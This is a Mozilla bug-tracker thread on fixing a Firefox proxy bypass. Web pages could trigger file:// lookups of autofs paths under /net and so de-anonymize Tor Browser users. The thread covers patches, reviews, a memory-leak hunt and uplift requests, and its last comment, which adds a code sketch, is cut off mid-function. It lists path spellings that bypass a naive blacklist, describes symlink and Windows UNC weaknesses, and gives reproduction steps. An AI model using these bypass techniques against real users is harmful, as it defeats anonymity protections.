(In reply to Alex Gaynor [:Alex_Gaynor] from comment #57)
> Now that this is resolved in macOS, I'd like to go about upstreaming to
> Firefox the improvements tor landed to refuse to access file:// resources
> earlier.
> 
> Arthur, is that something on your roadmap, or would it be helpful if I took
> that on? And if the latter, do you have a link to the patches that tor is
> currently applying for this?

If you could work on this, please do. The patches are here:

https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=4fbe4216456298af5c68198b3ff0f552f9bb8464
https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=a7ddff8279b931f42cccc538fc1cdd6a51c23795
https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=ab28cdb28b2e974129d141e4150f1486404cb254

Now, those were just hacks (and a follow-up bugfix) we deployed to close the critical hole as fast as possible and they are breaking some file:// usage scenarios. I am not sure Mozilla would want those. If so, fine with us. But if you or anyone else could use this opportunity to have a real fix ready for ESR 60 that would be great!
Flags: needinfo?(arthuredelstein)
Too late in the 59 cycle at this point.
This seems stalled.  Alex, do you still want to look at this?
I was planning on it, but haven't had the cycles to. With Apple's kernel fix the priority is slightly lower since it's non-exploitable on patched macOS.
Flags: needinfo?(agaynor)
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #61)
> I was planning on it, but haven't had the cycles to. With Apple's kernel fix
> the priority is slightly lower since it's non-exploitable on patched macOS.

Only for our use case. It's still a proxy bypass, so Tor is carrying an incomplete fix for this that (I think) breaks some functionality like Save to file or something similar. They're going to wind up backporting whatever we come up with to 60; so it would be good to avoid a confusing rebase for them...
Assignee: arthuredelstein → nobody
Priority: P1 → P2
Assignee: nobody → valentin.gosu
We are currently preparing Tor Browser based on ESR 60 and it turns out that a (critical) part of our workaround is broken now. Valentin: what's your planned timeframe for looking into this bug?
Flags: needinfo?(valentin.gosu)
I have a WIP patch based on bug 1413868 that seems to work in blocking file access to paths based on a pref blacklist.
I will post it for review shortly, hopefully with some tests :)
Flags: needinfo?(valentin.gosu)
Attached patch WIP-patch-and-gtest (obsolete) — Splinter Review
This WIP patch goes on top of attachment 8972049 [details] [diff] [review]. In the gtest I wrote a few ways I found to bypass the filter (which I then fixed), but there are a few others I didn't get to yet.
A few examples of paths that could be used to bypass the filter:
/./net/IP
/../../net/IP
/other/../net/IP
///net/IP
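To illustrate why these spellings slip past a naive prefix match, here is a small Python sketch (not the shipped C++; the patch uses its own normalizer) comparing a raw startswith check against one that lexically normalizes the path first:

```python
# Illustrative only: model of the bypass. posixpath.normpath collapses '.',
# '..' and runs of slashes purely lexically, without touching the filesystem
# (important here: no stat, so no automount is triggered by the check itself).
import posixpath

BLACKLIST = ["/net"]

def naive_blocked(path):
    return any(path.startswith(p) for p in BLACKLIST)

def normalized_blocked(path):
    return naive_blocked(posixpath.normpath(path))

# Each of the example paths above defeats the naive check...
for evil in ["/./net/1.2.3.4", "/../../net/1.2.3.4",
             "/other/../net/1.2.3.4", "///net/1.2.3.4"]:
    assert not naive_blocked(evil)
    # ...but is caught once the path is normalized first.
    assert normalized_blocked(evil)
```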
Comment on attachment 8979286 [details] [diff] [review]
WIP-patch-and-gtest

Review of attachment 8979286 [details] [diff] [review]:
-----------------------------------------------------------------

::: netwerk/test/gtest/TestFilePreferences.cpp
@@ +1,1 @@
> +#include "gtest/gtest.h"

should this live in xpcom?

::: xpcom/io/FilePreferences.cpp
@@ +70,5 @@
> +    Unused << p.ReadUntil(Tokenizer::Token::Char(','), path);
> +    if (!path.IsEmpty()) {
> +      PathBlacklist().AppendElement(path);
> +    }
> +  } while (!p.CheckEOF());

you don't need Record()
you have to read (check) the ',' character
the loop should be `while (!p.CheckEOF()) { do stuff; }`
you may want to do path.Trim() as you don't skip whitespaces
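The loop shape these review nits ask for looks roughly like this Python sketch (the real code uses the C++ Tokenizer class; names here are illustrative):

```python
# Model of the corrected pref-parsing loop: consume each path up to ',',
# consume the ',' itself, trim surrounding whitespace, skip empty entries.

def parse_blacklist(pref_value):
    blacklist = []
    for entry in pref_value.split(","):  # split() consumes the ',' separators
        path = entry.strip()             # entries may be padded with whitespace
        if path:                         # ignore empties ("a,,b", trailing ",")
            blacklist.append(path)
    return blacklist

assert parse_blacklist("/net, /misc,,") == ["/net", "/misc"]
assert parse_blacklist("") == []
```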
Valentin: Do you have an updated WIP patch we could test/include in our upcoming alpha? Right now, this is the only blocker for us for switching Tor Browser to ESR 60 next week in our alpha series: We can't ship the alpha with no workaround for this (for us) critical issue given that we "fixed" it a couple of months ago with an emergency release during the ESR 52 cycle.
Flags: needinfo?(valentin.gosu)
Attached patch patch (obsolete) — Splinter Review
Attachment #8985964 - Flags: review?(honzab.moz)
Attachment #8979286 - Attachment is obsolete: true
(In reply to Georg Koppen from comment #67)
> Valentin: Do you have an updated WIP patch we could test/include in our
> upcoming alpha? Right now, this is the only blocker for us for switching Tor
> Browser to ESR 60 next week in our alpha series: We can't ship the alpha
> with no workaround for this (for us) critical issue given that we "fixed" it
> a couple of months ago with an emergency release during the ESR 52 cycle.

Check out attachment 8985964 [details] [diff] [review]. I think it's fairly final. I'm just waiting for Honza's review and writing a few more tests for it.
Flags: needinfo?(valentin.gosu)
Comment on attachment 8985964 [details] [diff] [review]
patch

Review of attachment 8985964 [details] [diff] [review]:
-----------------------------------------------------------------

giving r+ with comments only because this is high priority and I may be offline for the next few days.  But there are things that MUST be addressed before landing; please read all the comments.

::: xpcom/io/FilePreferences.cpp
@@ +64,5 @@
> +  nsAutoCString blacklist;
> +  Preferences::GetCString("network.file.path_blacklist", blacklist);
> +  Tokenizer p(blacklist);
> +  while (!p.CheckEOF()) {
> +    nsCString path;

please use nsDependentCSubstring to save memory copying

@@ +69,5 @@
> +    Unused << p.ReadUntil(Tokenizer::Token::Char(','), path);
> +    path.Trim(" ");
> +    if (!path.IsEmpty()) {
> +      PathBlacklist().AppendElement(path);
> +    }

nit: you must consume the ',' token

@@ +236,5 @@
> +bool IsAllowedPath(const nsACString& aFilePath)
> +{
> +  for (const auto& prefix : PathBlacklist()) {
> +    if (StringBeginsWith(aFilePath, prefix)) {
> +      if (aFilePath.Length() != prefix.Length() &&

maybe a nit for better readability: aFilePath.Length() > prefix.Length()

::: xpcom/io/nsLocalFileUnix.cpp
@@ +141,5 @@
>        dirPath.IsEmpty()) {
>      return NS_ERROR_FILE_INVALID_PATH;
>    }
>  
> +  // When enumerating the directory, the paths have a slash at the end.

have or don't have?

OTOH, can we even get here?  few lines above you do aParent->GetNativePath().  has not the aParent object already been subjected to the check for path allowance?

@@ +329,5 @@
> +      FindInReadable(NS_LITERAL_CSTRING("/./"), mPath) ||
> +      FindInReadable(NS_LITERAL_CSTRING(".."), mPath) ||
> +      FindInReadable(NS_LITERAL_CSTRING("//"), mPath)) {
> +    mPath.Truncate();
> +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;

OK, this can't be here.  This was my main concern with the previous patch.  This can potentially break things.  It definitely changes behavior, is not behind the pref and definitely cannot be uplifted like this to ESR.

Move these lines INSIDE FilePreferences::IsAllowedPath and do it ONLY when there are names (prefixes) to be blacklisted, or do the normalization as I do in my base patch (you will need the normalizer to be a template and derive from TTokenizer<char_path_t>, like #ifdef XP_WIN typedef char16_t char_path_t; #else typedef char char_path_t; #endif)

But I think this "has special dir -> throw" approach is fine when off by default.  

OTOH, note that paths likely get here already normalized; at least on Windows I could see that navigating to file:///c:/./././././././././././ arrives at InitWithPath as file://c:/. No idea where that happens, but I made sure no smb request/lookup was triggered before InitWithPath was entered for file://///share URIs.


hmm... we should make sure there is no code in upper layers that may look for /. or /.. in the path and call some system API normalization function that could trigger the smb/net lookup.


then, just in case, remember that ':' is a directory delimiter on OSX!

@@ +576,5 @@
> +  }
> +
> +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> +  }

same case as above.
Attachment #8985964 - Flags: review?(honzab.moz) → review+
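The prefix-boundary behavior discussed in this review, blocking "/net" and "/net/x" without blocking "/nettle", and letting a trailing-slash entry like "/net/" cover only the children, can be sketched in Python as follows (illustrative, not the shipped code):

```python
# Model of the boundary rule: a prefix match only blocks the path when it is
# an exact match, ends on a path-component boundary, or the blacklist entry
# itself ends with the separator (so "/net/" covers children only).
SEPARATOR = "/"

def is_allowed_path(path, blacklist):
    for prefix in blacklist:
        if path.startswith(prefix):
            if (len(path) == len(prefix)
                    or path[len(prefix)] == SEPARATOR
                    or prefix.endswith(SEPARATOR)):
                return False
    return True

assert not is_allowed_path("/net", ["/net"])
assert not is_allowed_path("/net/1.2.3.4/a.css", ["/net"])
assert is_allowed_path("/nettle", ["/net"])
# A trailing-slash entry blocks children but not the bare parent, as discussed
# later in this bug for directory enumeration.
assert is_allowed_path("/net", ["/net/"])
assert not is_allowed_path("/net/child", ["/net/"])
```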
Attached patch patch (obsolete) — Splinter Review
Attachment #8985964 - Attachment is obsolete: true
(In reply to Honza Bambas (:mayhemer) from comment #70)
> Comment on attachment 8985964 [details] [diff] [review]
> > +  while (!p.CheckEOF()) {
> > +    nsCString path;
> 
> please use nsDependentCSubstring to save memory copying

I kept it nsCString to be able to still do path.Trim(" ")
Since this only happens once, at startup, the extra number of copies should be minimal.

> > +  // When enumerating the directory, the paths have a slash at the end.
> have or don't have?

Changed it to must have.

> OTOH, can we even get here?  few lines above you do
> aParent->GetNativePath().  has not the aParent object already been subjected
> to the check for path allowance?

Yes, but that depends on the blacklisted path. If the parent name is /folder and we blacklisted /folder/ it will not match, but all of its children will.

> 
> @@ +329,5 @@
> > +      FindInReadable(NS_LITERAL_CSTRING("/./"), mPath) ||
> > +      FindInReadable(NS_LITERAL_CSTRING(".."), mPath) ||
> > +      FindInReadable(NS_LITERAL_CSTRING("//"), mPath)) {
> > +    mPath.Truncate();
> > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> 
> OK, this can't be here.  This was my main concern with the previous patch. 
> This can potentially break things.  It definitely changes behavior, is not
> behind the pref and definitely cannot be uplifted like this to ESR.

Fair enough. Note that I kept some of the changes in AppendRelativeNativePath:
Append('.') does nothing.
Append('..') throws NS_ERROR_FILE_UNRECOGNIZED_PATH just like the windows implementation, and as specified in nsIFile.idl
I think the fact that it was accepted was a bug.

> Move these lines INSIDE FilePreferences::IsAllowedPath and do it ONLY when
> there are names (prefixes) to be blacklisted or do the normalization as I do
> in my base patch (you will need the normalizer be a template and derive from
> TTokenizer<chat_path_t>, like #ifdef XPWIN typedef char16_t char_path_t;
> #else typedef char char_path_t; #endif)

I made the Normalizer a template instead.
We now build the fileBlacklist code on windows too, even though it does nothing.

> But I think this "has special dir -> throw" approach if fine when off by
> default.  
> 
> OTOH, note that paths get here likely already normalized, at least on
> windows I could see that navigating to file:///c:/./././././././././././ is
> file://c:/ when coming to InitWithPath, no idea where that happens, but I
> made sure no smb request/lookup was triggered before InitWithPath was
> entered for file://///share uris.

I think this is done in nsLocalFile::Normalize().
However, on Linux it performs a call to the system realpath, which resolves relative paths and also links.

> then, just for case, remember that ':' is a directory delimiter on osx!

I think this was in older OSX versions (from what I can find on Google).

> @@ +576,5 @@
> > +  }
> > +
> > +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> > +  }
> 
> same case as above.

I'll keep this one around (to fix nsIFile.idl inconsistency) unless it breaks some tests.
Try run:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82

Georg, let me know if the attached patch is OK.
Note that it depends on Honza's patch from bug 1413868.

A few notes about the patch:
In order to block file access to "/net" you should add a pref (name:"network.file.path_blacklist", value:"/net")
It does have one weakness: symlinks. For a given symlink A that is not blacklisted, it is impossible to know, without resolving it, whether its target B is blacklisted or not.
Flags: needinfo?(gk)
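The symlink weakness can be demonstrated directly. This Python sketch (hypothetical helper names, using a throwaway temp directory) shows a purely lexical blacklist letting an innocent-looking link through even though it resolves to a blacklisted target:

```python
import os
import tempfile

blacklist = []

def is_allowed(path):
    # Purely lexical check, like the pref-based blacklist: no filesystem access.
    return not any(path.startswith(p) for p in blacklist)

tmp = os.path.realpath(tempfile.mkdtemp())
target = os.path.join(tmp, "blacklisted-dir")
os.mkdir(target)
blacklist.append(target)

link = os.path.join(tmp, "innocent-link")
os.symlink(target, link)

assert not is_allowed(target)            # direct access is blocked
assert is_allowed(link)                  # the symlink slips through the filter
assert os.path.realpath(link) == target  # yet it resolves to the blocked dir
```

Resolving the link (realpath) would close the hole, but on autofs the resolution itself can touch the filesystem, which is exactly what the blacklist is trying to avoid.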
Attached patch patchSplinter Review
Attachment #8986314 - Attachment is obsolete: true
(In reply to Valentin Gosu [:valentin] from comment #73) 
> > > +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> > > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> > > +  }
> > 
> > same case as above.
> 
> I'll keep this one around (to fix nsIFile.idl inconsistency) unless it
> breaks some tests.

Turns out it broke some tests. :)
test_bug1056939.js tested files that contained .. in them.
test_file_equality.js checks that appending . gives you a different file.

I filed bug 1469737 for this.

I also fixed the nsTArray_base leak at shutdown.
(In reply to Valentin Gosu [:valentin] from comment #74)
> Try run:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82
> 
> Georg, let me know if the attached patch is OK.

Do you have one rebased against ESR60 handy by chance? I get a bunch of conflicts in FilePreferences.cpp when trying to apply your patch. I'll try to resolve them but I am a bit nervous about the correctness of the result.

> Note that it depends on Honza's patch from bug 1413868.
> 
> A few notes about the patch:
> In order to block file access to "/net" you should add a pref
> (name:"network.file.path_blacklist", value:"/net")
> It does have one weakness: symlinks. For a given symlink A that is not
> blacklisted it is impossible to know if its target B is blacklisted or not.

What does that mean in practise? If an attacker is pointing to symlink A the proxy bypass we try to avoid is getting triggered?
Flags: needinfo?(gk) → needinfo?(valentin.gosu)
This is too late for ESR52 at this point (we've already built the 52.9.0 RC and that's the last scheduled release for that branch). We still want this for Fx62 & ESR 60.2, though.
(In reply to Georg Koppen from comment #79)
> (In reply to Valentin Gosu [:valentin] from comment #74)
> > Try run:
> > https://treeherder.mozilla.org/#/
> > jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82
> > 
> > Georg, let me know if the attached patch is OK.
> 
> Do you have one rebased against ESR60 handy by chance? I get a bunch of
> conflicts in FilePreferences.cpp when trying to apply your patch. I'll try
> to resolve them but I am a bit nervous about the correctness of the result.

I'll try to rebase it.

> > Note that it depends on Honza's patch from bug 1413868.
> > 
> > A few notes about the patch:
> > In order to block file access to "/net" you should add a pref
> > (name:"network.file.path_blacklist", value:"/net")
> > It does have one weakness: symlinks. For a given symlink A that is not
> > blacklisted it is impossible to know if its target B is blacklisted or not.
> 
> What does that mean in practise? If an attacker is pointing to symlink A the
> proxy bypass we try to avoid is getting triggered?

It means that if the attacker can create a symlink that points to B, or if the attacker is aware of A that points to B, they could potentially bypass the filter. That seems unlikely to me, but it's important to keep in mind.
Attached patch [ESR60] patch (obsolete) — Splinter Review
Georg, here is the ESR patch. I have yet to build it on Windows, but it passes all the tests on Linux.
Also it seems I didn't properly fix the shutdown leak.
Flags: needinfo?(valentin.gosu)
Attached patch [ESR60] patch (obsolete) — Splinter Review
The build selftest failed because the pref needed to be added to the early list
Attachment #8986596 - Flags: review?(bkelly)
Attachment #8986493 - Attachment is obsolete: true
Comment on attachment 8986596 [details] [diff] [review]
[ESR60]  patch

Review of attachment 8986596 [details] [diff] [review]:
-----------------------------------------------------------------

I only reviewed the ContentPrefs.cpp file.  It looked like the rest of the patch had already been reviewed elsewhere in this bug.
Attachment #8986596 - Flags: review?(bkelly) → review+
(In reply to Valentin Gosu [:valentin] from comment #87)
> Created attachment 8986596 [details] [diff] [review]
> [ESR60]  patch
> 
> The build selftest failed because the pref needed to be added to the early
> list

That one works for us, thanks so much! (The one you pointed me to in comment:83 still shows the problem. It took me a while to figure out what was going on :) )

I am not sure about the symlink issue yet. While I am not worried about the attacker being able to create a symlink, I feel it should not be possible for arbitrary (third-party) web content to trigger any proxy bypass once the user has told the browser "hey, for any web-related traffic, please use proxy $foo", irrespective of how the user's machine is configured outside of the browser. This does not block our alpha release, but we should think about it as we progress towards getting Tor Browser 8 into stable shape.
Nathan, can you take a look at attachment 8986337 [details] [diff] [review] ?
I'm leaking an nsTArray_base, sBlacklist, and I'm not exactly sure I'm using StaticAutoPtr correctly.
I've confirmed it's not sWhitelist by commenting it out: https://treeherder.mozilla.org/#/jobs?repo=try&revision=064c72d8511a3fa831cef3282fb75930ad6acf93&selectedJob=184200087

Any idea why this leak is happening? Thanks!
Talking to Valentin over IRC turned up two potential scenarios for sBlacklist to leak:

a) InitPrefs possibly getting called after sBlacklist has been released:

https://hg.mozilla.org/try/rev/7fb190786695#l1.49

So we're re-initializing prefs after shutdown...which seems quite unlikely.

b) Some sort of race in IsAllowedPath:

https://hg.mozilla.org/try/rev/145bf576adf9#l1.358

T1: In IsAllowedPath, check for the presence of sBlacklist
T1: sBlacklist is there, proceed
T2: clear sBlacklist as we're going through shutdown
T1: Call PathBlacklist, which re-allocates sBlacklist and leaks

This race is plausible in attachment 8986337 [details] [diff] [review] (though we really should have some checking in the ClearOnShutdown machinery to catch this sort of thing), but the try push actually changes things in IsAllowedPath:

https://hg.mozilla.org/try/file/5c706ce50459/xpcom/io/FilePreferences.cpp#l267

so that we don't try reallocating...but in that case, we should hit some sort of null pointer dereference if the race was really happening.

I tried getting a handle on where the allocated nsTArray_base was coming from, but the debugging infrastructure we had for that blew up in my face.

So now I'm not sure where the leak is coming from. =/
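Scenario b) can be modeled deterministically in a few lines of Python (names mirror PathBlacklist()/ClearOnShutdown for illustration only; this is not the actual code). Replaying the T1/T2 interleaving in order shows the lazily-allocating accessor re-creating the global after shutdown:

```python
# Deterministic model of the suspected check-then-act race: a lazily
# allocating accessor re-creates the global after shutdown has cleared it,
# so the second allocation is never freed ("leaks").

blacklist = None
allocations = 0

def path_blacklist():
    """Lazily-allocating accessor, like PathBlacklist() in the patch."""
    global blacklist, allocations
    if blacklist is None:
        blacklist = []
        allocations += 1
    return blacklist

def clear_on_shutdown():
    global blacklist
    blacklist = None

path_blacklist()                 # T1: sees the list is present
assert blacklist is not None
clear_on_shutdown()              # T2: shutdown clears it under T1's feet
path_blacklist()                 # T1: proceeds on its stale check
assert allocations == 2          # re-allocated after shutdown: leaked
```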
This call is gated by #ifdef OS_WIN, so on Linux it would leak objects in the plugin process that were supposed to be released via ClearOnShutdown
Attachment #8990057 - Flags: review?(jmathies)
Comment on attachment 8990058 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Review of attachment 8990058 [details] [diff] [review]:
-----------------------------------------------------------------

::: xpcom/io/FilePreferences.cpp
@@ +10,2 @@
>  #include "mozilla/Preferences.h"
> +#include "mozilla/StaticPtr.h"

while you are here, can you please incorporate [1]?  just the #include.  thanks.  or maybe it belongs in the header?

[1] https://bugzilla.mozilla.org/attachment.cgi?id=8986398&action=diff#a/xpcom/io/FilePreferences.cpp_sec2

@@ +120,5 @@
>    }
>  
> +  bool Get(nsTSubstring<TChar>& aNormalizedFilePath)
> +  {
> +    aNormalizedFilePath.Truncate();

there probably wasn't a need to inline this, but as this is static, it doesn't matter

@@ +269,5 @@
> +    return true;
> +  }
> +
> +  nsTAutoString<char_path_t> normalized;
> +  if (!Normalizer<char_path_t>(aFilePath, Normalizer<char_path_t>::Token::Char(kPathSeparator)).Get(normalized)) {

don't you want TNormalizer<T> and then `typedef TNormalizer<char_path_t> Normalizer;` ?

::: xpcom/io/nsLocalFileUnix.cpp
@@ +1048,4 @@
>  
>    // check to make sure that we have a new parent
>    nsAutoCString newPathName;
>    rv = GetNativeTargetPathName(aNewParent, aNewName, newPathName);

we may want to check before this call

@@ +2199,4 @@
>  
>    // check to make sure that we have a new parent
>    nsAutoCString newPathName;
>    rv = GetNativeTargetPathName(aNewParentDir, aNewName, newPathName);

as well here?
Attachment #8990058 - Flags: review?(honzab.moz) → review+
(In reply to Honza Bambas (:mayhemer) from comment #94)
> don't you want TNormalizer<T> and then `typedef
> TNormalizer<char_path_t> Normalizer;` ?

Great suggestion, Thanks!

> ::: xpcom/io/nsLocalFileUnix.cpp
> >    rv = GetNativeTargetPathName(aNewParent, aNewName, newPathName);
> 
> we may want to check before this call
> >    rv = GetNativeTargetPathName(aNewParentDir, aNewName, newPathName);
> 
> as well here?

Before these calls we have CHECK_mPath which checks FilePreferences::IsAllowedPath()
Attachment #8990057 - Flags: review?(jmathies) → review+
https://hg.mozilla.org/integration/mozilla-inbound/rev/9ec0f327c5efc38970c090015eaf11a7e5c450b7
Bug 1412081 - Add ability to blacklist file paths on Unix platforms r=mayhemer

https://hg.mozilla.org/integration/mozilla-inbound/rev/26163df1083ea2847022e60518ab973360b9d7c1
Bug 1412081 - Call KillClearOnShutdown(ShutdownPhase::ShutdownFinal) in PluginProcessChild on all platforms r=jimm
https://hg.mozilla.org/mozilla-central/rev/9ec0f327c5ef
https://hg.mozilla.org/mozilla-central/rev/26163df1083e
Group: network-core-security → core-security-release
Status: NEW → RESOLVED
Closed: Last year
Resolution: --- → FIXED
Target Milestone: --- → mozilla63
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #46)
> I think Boris added a bunch of very valuable information within comment 44.
> Probably it's best we don't do stat() within ::init() but instead rather
> move it to asyncOpen2. Or more precisely to the contentSecurityManager right
> after we preform the CheckLoadURI check.

I'm late to this particular party, but should we perhaps still pursue this in a follow-up bug as a belt-and-suspenders type mitigation in case attackers find another type of path that somehow leaks information in this way? Christoph?
Flags: needinfo?(ckerschb)
Mind requesting uplift to beta/esr60?
Flags: needinfo?(valentin.gosu)
Attachment #8990058 - Attachment is obsolete: true
Comment on attachment 8993177 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Approval Request Comment
[Feature/Bug causing the regression]:
TOR requirement to block access to certain paths on the filesystem

[User impact if declined]:
A website could potentially de-anonymize a user who has autofs installed by triggering access to certain paths under /net/ on Unix-like machines.

[Is this code covered by automated tests?]:
The patch includes a gtest

[Has the fix been verified in Nightly?]:
Yes

[Needs manual test from QE? If yes, steps to reproduce]: 
Reproduce comment 0. Set network.file.path_blacklist to /net. Restart the browser. Check that the bug is fixed.

[List of other uplifts needed for the feature/fix]:
attachment 8990057 [details] [diff] [review] to avoid leaks in the plugin process.

[Is the change risky?]:
Low risk

[Why is the change risky/not risky?]:
The patch only takes effect when the pref is set, which will probably only be the case for Tor Browser.

[String changes made/needed]:
None.
Flags: needinfo?(valentin.gosu)
Attachment #8993177 - Flags: approval-mozilla-beta?
Attachment #8986596 - Attachment is obsolete: true
Comment on attachment 8993178 [details] [diff] [review]
[ESR60]  patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
Required by Tor Browser.

User impact if declined:
[Tor] A website could potentially de-anonymize a user who has autofs installed by triggering access to certain paths under /net/ on Unix-like machines.

Fix Landed on Version:
Firefox 63 with an uplift requested for beta 62.

Risk to taking this patch (and alternatives if risky):
Low risk. The functionality is only enabled when the hidden pref is set, which would only be the case in Tor Browser.

String or UUID changes made by this patch:
None.
Attachment #8993178 - Flags: approval-mozilla-esr60?
Hi Valentin, just a note, generally by "verified" we mean that the issue was reproducible and the fix was checked by someone who isn't the assignee or reviewer.
Flags: qe-verify+
Comment on attachment 8993177 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Fix for potential de-anonymization, let's uplift for beta 11.
Attachment #8993177 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #8990057 - Flags: approval-mozilla-beta+
I didn't manage to reproduce the issue. I used an older version of Firefox (2017-10-26) on Ubuntu 16.04 x64 and macOS 10.13. 

Can you please give me some more detailed steps to reproduce or a screencast with the steps?
Thank you.
Flags: needinfo?(arthuredelstein)
(In reply to Oana Botisan from comment #108)
> I didn't manage to reproduce the issue. I used an older version of Firefox
> (2017-10-26) on Ubuntu 16.04 x64 and macOS 10.13. 
> 
> Can you please give me some more detailed steps to reproduce or a screencast
> with the steps?
> Thank you.

How did you try to reproduce this bug?
Flags: needinfo?(oana.botisan)
With the steps from comment 0 mostly.
I used 2 different stations. One was on mac and the other on Ubuntu.
On mac I created the pref from comment 103 (network.file.path_blacklist set to /net). I changed the proxy and port and I opened the link from comment 0 (https://pearlcrescent.com/tor/am.html).

On Ubuntu, I opened Firefox, changed the pref and port and then in the terminal I wrote the command "sudo tcpdump port 111".

Did I do something wrong? Maybe I didn't fully understand what I have to do, because I got the same behaviour on the old builds as on the latest Nightly.
Flags: needinfo?(oana.botisan)
What version of macOS are you on?

This issue will no longer occur on 10.13.3 or newer.
I was on macOS 10.13. 
But the steps were correct?
(In reply to Oana Botisan from comment #110)
> With the steps from comment 0 mostly.
> I used 2 different stations. One was on mac and the other on Ubuntu.
> On mac I created the pref from comment 103 (network.file.path_blacklist set
> to /net). I changed the proxy and port and I opened the link from comment 0
> (https://pearlcrescent.com/tor/am.html).
> 
> On Ubuntu, I opened Firefox, changed the pref and port and then in the
> terminal I wrote the command "sudo tcpdump port 111".
> 
> Did I do everything wrong? Maybe I didn't understand fully what I have to
> do, because I got the same behaviour on the old builds as on the latest
> Nightly.

I am not sure regarding macOS, but on Linux you need to install the autofs package and uncomment the line "/net   -hosts" in /etc/auto.master first as a preparation step. When testing our backport of this patch, I configured Tor as a proxy (installing Tor via your package manager and then entering 127.0.0.1:9050 as the SOCKS proxy host/port should suffice) and then looked at my local wireshark output. Hope this helps. Let me know if not.
Flags: needinfo?(arthuredelstein)
I can't seem to reproduce the issue, therefore I can't verify the fix. I will remove the qe+ flag.
Can you please verify to see if the bug is reproducing on the latest beta and Nightly?
Flags: qe-verify+ → needinfo?(arthuredelstein)
Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged] → [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage]
(In reply to :Gijs (he/him) from comment #98)
> I'm late to this particular party, but should we perhaps still pursue this
> in a follow-up bug as a belt-and-suspenders type mitigation in case
> attackers find another type of path that somehow leaks information in this
> way? Christoph?

Yes, at least we should try. FWIW, I filed Bug 1479410 for that reason.
Flags: needinfo?(ckerschb)
Comment on attachment 8993178 [details] [diff] [review]
[ESR60]  patch

Fixes a critical issue for Tor browser users and behavior is behind a pref not exposed to regular Firefox users. Approved for ESR 60.2.
Attachment #8993178 - Flags: approval-mozilla-esr60? → approval-mozilla-esr60+
(In reply to Ryan VanderMeulen [:RyanVM] from comment #118)
> Backed out from ESR60 for Linux/OSX leaks and Windows GTest failures.

The leaks are caused by the fact that attachment 8990057 [details] [diff] [review] should also land with the ESR patch.
Looking at the gtest failure now.
Attachment #8990057 - Flags: approval-mozilla-esr60+
Attached patch esr_fix.patchSplinter Review
As the comment in the patch says, the changes I made required the whitelist to be properly instantiated - which the gtest did not previously do.
Flags: needinfo?(valentin.gosu)
In the future, it would be really nice if the follow-up patches were folded into the main patch for landing.
(In reply to Ryan VanderMeulen [:RyanVM] from comment #121)
> In the future, it would be really nice if the follow-up patches were folded
> into the main patch for landing.

Will do. Thanks!
Depends on: 1413868
Valentin, there seems to be some kind of discrepancy between our code base and the Tor code base on ESR60 (IIUC).

Our code (the current, latest changeset):
https://hg.mozilla.org/releases/mozilla-esr60/annotate/8a1e8be23bad/xpcom/io/FilePreferences.cpp#l263

Tor code:
(patch) https://gitweb.torproject.org/user/richard/tor-browser.git/commit/xpcom/io/FilePreferences.cpp?h=bug_26874&id=50f4653b90316394e7d6d3cd4a3e92e12f377666
(file) https://gitweb.torproject.org/user/richard/tor-browser.git/tree/xpcom/io/FilePreferences.cpp?h=bug_26874&id=50f4653b90316394e7d6d3cd4a3e92e12f377666#n263

Please see https://bugzilla.mozilla.org/show_bug.cgi?id=1413868#c70 for further details.  They claim that the patches don't work and that removing the |if (!sWhitelist) { return false; }| part fixes it.

It may be that AllowUNCDirectory(), which ensures sWhitelist is populated, is not being called for some reason.

Maybe we should change the code to block all UNC paths when sWhitelist is null and sBlockUNCPaths == true?


It's hard to track what's actually correct with all the backouts and merges.


Note: https://dxr.mozilla.org/mozilla-esr60/ is out of sync ://
Flags: needinfo?(valentin.gosu)
Ok I have access now!

Yeah, so the issue here is that sWhitelist is only populated after a call to PathWhitelist().  The various directories are whitelisted during Firefox init (and sWhitelist is populated) in AllowUNCDirectory(char const*) by way of InitDirectoriesWhitelist().  However, the call to PathWhitelist() does not occur until the end of AllowUNCDirectory(), and only if the directory resolves to an SMB path (i.e., begins with \\).  So, unless one of the special dirs lives on an SMB share, sWhitelist will never be populated, and the call to IsBlockedUNCPath() will always early-out due to the !sWhitelist check.

The !sWhitelist check should be removed, since the underlying pointer is never accessed directly, but always through the PathWhitelist() getter/initializer.

I've attached a screenshot (here: https://bugzilla.mozilla.org/show_bug.cgi?id=1413868) demoing that the proxy bypass still exists in ESR60 on Windows 7.
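To illustrate the hazard described above, here is a minimal self-contained sketch (not the actual FilePreferences.cpp code; the names merely mirror it). sWhitelist starts out null and is only created lazily through the PathWhitelist() getter, so an early `!sWhitelist` return in the blocking check silently allows every UNC path until something happens to force the whitelist into existence:

```cpp
#include <cassert>
#include <memory>
#include <string>
#include <vector>

// Sketch only: mirrors the shape of FilePreferences.cpp, not the real code.
static bool sBlockUNCPaths = true;
static std::unique_ptr<std::vector<std::string>> sWhitelist;

// Lazy getter/initializer: the list is created on first use.
static std::vector<std::string>& PathWhitelist() {
  if (!sWhitelist) {
    sWhitelist.reset(new std::vector<std::string>());
  }
  return *sWhitelist;
}

// True if aPath starts with any whitelisted prefix.
static bool IsWhitelisted(const std::string& aPath) {
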